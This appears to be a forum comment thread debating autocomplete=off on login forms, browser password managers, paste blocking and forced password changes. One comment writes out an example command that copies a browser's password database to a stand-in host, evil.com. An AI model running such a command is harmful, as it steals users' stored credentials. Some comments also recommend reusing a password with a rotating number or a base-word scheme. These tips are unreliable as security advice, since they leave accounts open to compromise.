I've run into the problem of web services not letting me store passwords. The reality is, if you let my password manager (safari jacks into OS X's keychain system) keep track of things, I'm going to use the random 12-digit alphanumeric password my password manager provides me. If you don't, I'm either going to use my shitty "brain" password or put it in my password manager anyway and just copy-paste it manually.
Thankfully, safari on both iOS and OS X has a toggle to ignore autocomplete=off, which I take advantage of liberally.
My biggest problem is with sites that don't let me copy/paste into the password field. WTF!? Who's the PHB that came up with this policy? Despite this misguided nannying, I still use randomly generated 22 character alphanumeric passwords, even if I have to open up the window in Keepass and manually type them in. Most people aren't as paranoid and anal as me, however. Whoever you are, you're basically encouraging people to use weak passwords.
Ironic, as it seems to be banks that are most often guilty of this.
Worse yet, there are banks that don't let you use any of the last 3-5 passwords. This is really annoying, especially when combined with enforcing a password change every 3 or 6 months. But there is a solution: just use whatever password you have chosen, and add a number for the current quarter or semester. Until they come up with a password strength checker measuring the similarity between your current and previous passwords (eg. levenshtein()), you should be ok.
Until they come up with a password strength checker measuring the similarity between your current and previous passwords (eg. levenshtein()), you should be ok.
> Please note that if you combine this policy and at the same time disable copy and paste into the password fields (I look at you, Blizzard!), I hate you.
oh man. disabling paste is the worst, because it breaks keypassx. (Apple did this last I checked!)
turbotax did that as well last year, this year they made it sane again. Luckily there's a firefox about:config setting you can do to not let websites hijack / block your clipboard events.
Another way to bypass these fields where you can't paste a password (many games are guilty of this atrocity): make an AutoHotkey[1] script for rapidly typing whatever is in your clipboard.
This line will make ctrl-alt-v type your clipboard:
The first thing I install in a new browser is an adblocker. The second thing an addon that disables autocomplete=off.
Yes I'm lazy. But my laptop is encrypted and goes back to the login screen after 2 minutes of inactivity. To me autocomplete=off is just annoying and doesn't add any security.
it really helps with forms where you are an admin and can edit other users information... in these forms when autocomplete is on... and starts populating your information into the user you're trying to edit... well... things just get pretty messed up...
I used to be annoyed by autocomplete=off until I started using 1Password. Now, I actually tell Chrome to disable auto-filling of forms since I can fill the form fields with 1Password, which is the only place I'm keen to store personal information.
This drives some of our customers nuts because autocomplete has the annoying tendency in the most recent Safari of overwriting prepopulated fields - users end up losing configurations over this.
Otherwise I can see the benefit of ignoring the setting, perhaps, but we need consistent default behavior (chance would be a fine thing!). I don't want to be telling my customers that they should switch off autocomplete as a user shouldn't need to configure a browser to use a website!
Have you filed a bug report about Safari overwriting prepopulated fields? If not, and you don't want to deal with the painful experience that is bugreport.apple.com, feel free to drop me an email with more details about what you're seeing.
The original article fails to take into account the larger population. The basic password managers in browsers are huge security holes. The one in FF does not use a master password by default, so anyone could look at an unattended computer and see all stored passwords with a few clicks. The article mentions an old JavaScript attack on the passwords as well (but then dismisses the threat, since that one hole was patched).
So the problem really is that the browsers pushed insecure features out to the masses, and many people adopted them. The number of people in the general population who use a password manager is low (obviously it is high here on HN). So think of the autocomplete=off flag as a flag to make sure you are using a competent password manager, one that recognizes the problem and then overrides the flag. Sounds like Safari and IE 11 are already doing that, so hopefully they fixed the problems of the early password managers.
Compared to weak passwords, phishing and a myriad other threats, how likely is that someone will walk up to my computer and copy a password? How likely are they to have a true criminal intent rather than a prank on their mind?
And when your machine is compromised or otherwise controlled by an untrustworthy third party, you lost anyway.
I think the argument is that you are less likely to use the same password on every site and service, or easily guessed passwords, if you are allowed to use a password manager.
In other words, in practice there is an actual tradeoff between the two.
However, auto complete is a great way to fight phishing. It's easy to tell people you think your on website X but your password never shows up your probably on a different site. And the simple fact there password is not there is enough to get most people get somewhat paranoid.
So, for most people you trade a near meaningless threat to fight a major one which tends to be a net win.
> The one in FF does not use a master password by default, so anyone could look at an unattended computer and see all stored passwords with a few clicks.
Or, in its absence, take a look at the stickynotes and see all the password the person is using for everything. Or guess that the user's password is 'password' or something stupid like 'secret'
I mean I agree that it's a bad call for public computers to have it enabled by default. But among people's likely options I'd far sooner have them using even a bad password manager than what I perceive them to be likely to do in its absence - and from that perspective pretty much anything that lowers the likely adoption of password managers seems like a bad call.
I don't think that the larger population are going to find that FF's password manager doesn't work with a site and go running off to download KeePass or Lastpass or something like that. I think they're just going to shrug and type in 'password', (or some other dictionary word and a couple of numbers on the end - but in any case something re-used and simple,) for that site.
You might not agree with this but hear me out. I used to work on Chrome and I was curious what the justification was for storing passwords unencrypted in Chrome. I went and talked to the Chrome security team and they frustratingly explained it to me as they get this question all the time.
As you said, in FF, (and in Chrome), a few clicks and anyone could look and an unattended computer and see all the stored passwords. As they pointed out, an unlocked unintended computer can pretty much be owned by anyone who wants to own it. You've given them access to your computer. They can open a shell and start running apps. They can exploit any bug in the OS or other app. They can copy files to a USB stick or across the net. On top of that, your password manager (or FF or Chrome) will let them log into your mail, your bank, your facebook, whatever services you've saved passwords for even without knowing your password.
The point is
(1) don't leave your computer unlocked and unattended. Put a password on it, when you walk away from the computer lock the computer (start the screensaver or whatever that makes it required you to use a password to get back in)
(2) don't ever let someone use your computer logged in as you. If you hand someone your computer to use login as guest then hand it to them.
If you're like me you'll probably reject these suggestions. I thought "I don't want to be bother to lock and unlock my computer all the time" and I thought "It's stupid to expect me to put my computer in guest mode anytime I let someone else use it."
But, after I calmed down and thought about it I realized they are right. If someone wants your passwords or other data and you hand them an unlocked machine they are going to get them. How FF or Chrome or Password managers store passwords has nothing to do with that.
Well, why didn't the password managers in several browsers do that by default?
Also, not all attacks are about "pwning" a computer. If an attacker can gather data, such as competitive corporate data, without being detected, that is much better in many ways. In practical terms, it would also be much faster (and unntraceable) to look at 2-3 key passwords in someone's open Firefox than to infect their computer with malware.
Let me fix one line in your post: If someone with sufficient technical knowledge wants your passwords or other data and you hand them an unlocked machine they are going to get them.
Now, reducing the technical knowledge required from "opening a shell and running apps" to "click here to see all passwords in seconds" greatly reduces the technical knowledge required and so greatly increases the risk you're exposed to.
You're right. But, I'm guessing the set of people who know they could see your password easily is pretty much the same set of people with sufficient technical knowledge that they either know how to do more or know how to find out how to do more.
Open terminal type
scp .somebrowser/password.db user@evil.com:
Takes no more time than writing down passwords like nfie28447ncjf;$/$38342. Probably less if there's more than one password
> So think of the autocomplete=off flag as a flag to make sure you are using a competent password manager
No, what happens is that autocomplete=off flag is a flag to make sure you are using your brain as a password manager, which experience has shown to be a terrible idea.
Instead of a browser password manager that can help make your passwords unique per site and comprised of random characters, users are forced to use passwords from their head, likely sharing them between sites. Someone coming to your unattended computer isn't nearly the threat of you using a simple and short password across every site you visit, including the sites that end up with a stolen passwords database or have a moronic password recovery option.
This article uses "password managers" ambiguously. In my opinion, a browser is a terrible password manager because of what is stated in the "pros" section of the article. My advice aligns with others who have replied here - get a real password manager such as 1password and allow autocomplete="off" to do what it is supposed to do.
Sorry, but which of the two points in the ‘pro’ section (storing truly sensitive visible information and hacking of client-site databases) makes a browser less capable of acting as a password manager than a ‘real’ password manager?
Or maybe you could rephrase why you think browsers are terrible password managers? I’m quite fond of Opera’s Wand.
I'm going to go out on a limb and suggest just because 1password is really really good. So good that I don't even want to try a browser's password manager (especially since I want access to my passwords on multiple browsers and my phone/tablet as well). I'm sure browser password managers have made leaps and bounds, but so as 1password and it's amazing.
The issue may be moot--IE 11 ignores autocomplete=off.
And in any case, for the cases where this setting is effective, it doesn't break password managers--just set your password manager to not fill the fields, but use copy and paste for the password.
> Tell me how I am supposed to fulfill these requirements if I need 20 websites daily to do my work ?
One solution to this problem (or at least one way to severely mitigate it) is to use a base word that you tweak with a simple algorithm based on the first letter, last letter, number of letters in the domain, etc. Of course some websites have mutually exclusive requirements, so this doesn't work for all sites, but I've been doing this for so many years now that while I have muscle memory for frequently used sites, I can go to a site I haven't been to in years and have no memory of the actual characters in the password, but I apply my algorithm and voila, it works!
I changed all my passwords recently to do the same thing. The problem I've recently started to see is that, let's say for example my hashed+salted password is stolen from a site. If they brute-force figure out what my password is, they'll have my "base word" and all my other accounts may still be able to be compromised.
Recently I changed my big accounts (Google, Facebook, StackOverflow) to have a slightly different "base word" and the other accounts that I can afford to lose control of have stayed the same.
It's significantly more difficult to reuse the base and figure out the additional characters than it is to get access to the user whose password is 'password'
For insecure services that I use on mobile, public, etc computers, I do this.
Sorry, I don't have time to do so much work just to log on quickly on my email the morning or when relogging for the 25th time in the ticket manager at work, that has too short sessions.
Also, enjoy explaining your method to a lambda user, I'd bring popcorn and watch :)
Forced password changes are the biggest downside I've run into... I had to resort to a modified algorithm when LinkedIn was hacked, for instance. But for 90%+ of the websites I use it on, especially social networks and forums and the like, it's hardly ever an issue.
I don't think I've run into a situation where LastPass has been unable to auto-fill a form. Is this a feature of LastPass, or have I just not gone to sites that disallow autocomplete?
It's the latter. I use LastPass too, and there's one particular site where it doesn't autofill, because of autocomplete=off. It's just one site, but incredibly annoying because I use it often multiple times per day (and of course it doesn't allow me to stay logged in either.)
1password makes this never be an issue for me. ⌘+/ to log into anything with one stroke, unless I have multiple accounts for the site, in which case it's a couple of extra clicks.
I'm going to go with Bruce Schneier on this one and say that there is absolutely nothing wrong with writing your passwords down. If someone mugs me and takes my wallet there is a 99% chance they are going to get the phone too and I'll need to change all my passwords anyway.
Not letting the browser cache them is still dumb though.
Could you not run an analysis of a user's password on account creation or password reset that determines if it is likely to be autogenerated and managed by a password manager. Then armed with this flag enable or disable autocomplete on a user by user basis with javascript?
Someone was showing me Capital One 360 (formerly ING), which uses an onscreen PIN pad that you either have to click with your mouse, or type using a randomly generated mapping. The idea is to thwart keystroke loggers, but it's totally infuriating.
The worst part is, it doesn't even thwart keyloggers very well! It's not uncommon for password stealing malware to detect when the user is viewing a site that uses a "PIN pad" login of this type, and start taking screenshots surrounding the location of each click to capture input.
How does it break password managers? Does it prevent them from auto-filling in or auto-saving the password? I use passpack and enter/retrieve my credentials manually and so don't experience this and appreciate autocomplete=off.
Only slightly related, but I really wish GitHub would add autocomplete=off on the language selection dropdown for Gist. If you make your own autocomplete UI, I would prefer that you disable the browser UI.
I used to use Chrome as my second browser, where I'd keep my work gmail account up.
Recently it started to no longer save my password, even with an autocomplete=on plugin installed that works on other sites. That was my catalyst for uninstalling Chrome altogether and moving to Firefox for everything.
Right, this isn't what autocomplete=off is for. It's for fields where correcting the user's input to dictionary words is of negative utility, for example, typing stock tickers should not correct "aapl" to "apple".
1. Go to about:config
2. Right-click anywhere, New -> Boolean:
signon.overrideAutocomplete
Value: true
More info: https://bugzilla.mozilla.org/show_bug.cgi?id=425145
EDIT: Based on the milestone set on that issue, this setting requires Firefox 29. Another workaround is this bookmarklet: https://www.squarefree.com/bookmarklets/forms.html#remember_... referenced from comment https://bugzilla.mozilla.org/show_bug.cgi?id=425145#c16